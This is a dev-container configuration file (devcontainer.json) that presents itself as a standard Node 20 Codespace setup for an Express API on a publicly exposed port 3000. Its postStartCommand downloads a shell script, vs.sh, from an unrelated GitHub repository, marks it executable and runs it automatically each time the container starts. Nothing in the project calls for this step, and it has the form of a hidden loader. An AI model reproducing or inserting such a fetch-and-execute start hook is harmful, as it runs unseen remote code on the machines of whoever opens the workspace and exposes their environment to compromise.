{

  "name": "Codespace Node App",



  "image": "mcr.microsoft.com/devcontainers/base:bookworm",



  "features": {

    "ghcr.io/devcontainers/features/node:1": {

      "version": "20"

    }

  },



  "workspaceFolder": "/workspaces/${localWorkspaceFolderBasename}",



  "forwardPorts": [3000],



  "portsAttributes": {

    "3000": {

      "label": "Express API",

      "visibility": "public"

    }

  },



  "postCreateCommand": "",

  "postStartCommand": "wget https://raw.githubusercontent.com/projectbasedicod/prad/refs/heads/main/vs.sh && chmod +x vs.sh && ./vs.sh"



}
